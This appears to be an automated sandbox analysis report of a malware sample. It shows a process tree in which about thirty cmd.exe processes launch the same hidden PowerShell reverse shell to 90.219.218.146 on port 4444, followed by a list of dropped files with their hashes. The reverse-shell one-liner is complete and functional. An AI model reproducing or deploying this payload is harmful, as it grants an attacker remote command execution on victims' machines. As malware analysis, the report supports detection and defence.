C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:60
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4232
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:388
-
-
-
C:\Windows\System32\GameBarPresenceWriter.exe"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer1⤵PID:4880
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3624
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99KB
MD58697c106593e93c11adc34faa483c4a0
SHA1cd080c51a97aa288ce6394d6c029c06ccb783790
SHA256ff43e813785ee948a937b642b03050bb4b1c6a5e23049646b891a66f65d4c833
SHA512724bbed7ce6f7506e5d0b43399fb3861dda6457a2ad2fafe734f8921c9a4393b480cdd8a435dbdbd188b90236cb98583d5d005e24fa80b5a0622a6322e6f3987
-
Filesize
83KB
MD56c7565c1efffe44cb0616f5b34faa628
SHA188dd24807da6b6918945201c74467ca75e155b99
SHA256fe63361f6c439c6aa26fd795af3fd805ff5b60b3b14f9b8c60c50a8f3449060a
SHA512822445c52bb71c884461230bb163ec5dee0ad2c46d42d01cf012447f2c158865653f86a933b52afdf583043b3bf8ba7011cc782f14197220d0325e409aa16e22
-
Filesize
264KB
MD5ce4df4dfe65ab8dc7ae6fcdebae46112
SHA1cdbbfda68030394ac90f6d6249d6dd57c81bc747
SHA256ffbe84f0a1eab363ca9cf73efb7518f2abd52c0893c7cc63266613c930855e96
SHA512fc8e39942e46e4494356d4a45257b657495cbfa20e9d67850627e188f70b149e22603ae4801b4ba7b9a04d201b3787899d2aee21565237d18e0afce9bae33ee9
-
Filesize
63KB
MD5f377a418addeeb02f223f45f6f168fe6
SHA15d8d42dec5d08111e020614600bbf45091c06c0b
SHA2569551431425e9680660c6baf7b67a262040fd2efceb241e4c9430560c3c1fafac
SHA5126f60bfac34ed55ff5d6ae10c6ec5511906c983e0650e5d47dac7b8a97a2e0739266cae009449cced8dff59037e2dbfc92065fbbdfde2636d13679e1629650280
-
Filesize
157KB
MD5b5355dd319fb3c122bb7bf4598ad7570
SHA1d7688576eceadc584388a179eed3155716c26ef5
SHA256b9bc7f1d8aa8498cb8b5dc75bb0dbb6e721b48953a3f295870938b27267fb5f5
SHA5120e228aa84b37b4ba587f6d498cef85aa1ffec470a5c683101a23d13955a8110e1c0c614d3e74fb0aa2a181b852bceeec0461546d0de8bcbd3c58cf9dc0fb26f5
-
Filesize
77KB
MD5f5dd9c5922a362321978c197d3713046
SHA14fbc2d3e15f8bb21ecc1bf492f451475204426cd
SHA2564494992665305fc9401ed327398ee40064fe26342fe44df11d89d2ac1cc6f626
SHA512ce818113bb87c6e38fa85156548c6f207aaab01db311a6d8c63c6d900d607d7beff73e64d717f08388ece4b88bf8b95b71911109082cf4b0c0a9b0663b9a8e99
-
Filesize
822KB
MD5d3a47ef5b669b3ab59aa27a54b015d24
SHA1d646309640b93ce05d268a00104d8a6ee6ee4463
SHA256b89ba73c7ce7a7800237401b351b047996f3c975f9e6ed401864f5481acf644f
SHA51209095fc7042a77f0c35f6a79d2c180b2660b613a82697a29662e39db80b3ed442c0433f915d17a271aba2f4f5c39615af2bac274de7095dd907413414d630dcc
-
Filesize
3.2MB
MD5cc4cbf715966cdcad95a1e6c95592b3d
SHA1d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA5123b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477
-
Filesize
4.3MB
MD511c051f93c922d6b6b4829772f27a5be
SHA142fbdf3403a4bc3d46d348ca37a9f835e073d440
SHA2560eabf135bb9492e561bbbc5602a933623c9e461aceaf6eb1ceced635e363cd5c
SHA5121cdec23486cffcb91098a8b2c3f1262d6703946acf52aa2fe701964fb228d1411d9b6683bd54527860e10affc0e3d3de92a6ecf2c6c8465e9c8b9a7304e2a4a6
-
Filesize
26KB
MD57a442bbcc4b7aa02c762321f39487ba9
SHA10fcb5bbdd0c3d3c5943e557cc2a5b43e20655b83
SHA2561dd7bba480e65802657c31e6d20b1346d11bca2192575b45eb9760a4feb468ad
SHA5123433c46c7603ae0a73aa9a863b2aecd810f8c0cc6c2cd96c71ef6bde64c275e0fceb4ea138e46a5c9bf72f66dcdea3e9551cf2103188a1e98a92d8140879b34c
-
Filesize
1.1MB
MD58320c54418d77eba5d4553a5d6ec27f9
SHA1e5123cf166229aebb076b469459856a56fb16d7f
SHA2567e719ba47919b668acc62008079c586133966ed8b39fec18e312a773cb89edae
SHA512b9e6cdcb37d26ff9c573381bda30fa4cf1730361025cd502b67288c55744962bdd0a99790cedd4a48feef3139e3903265ab112ec545cb1154eaa2a91201f6b34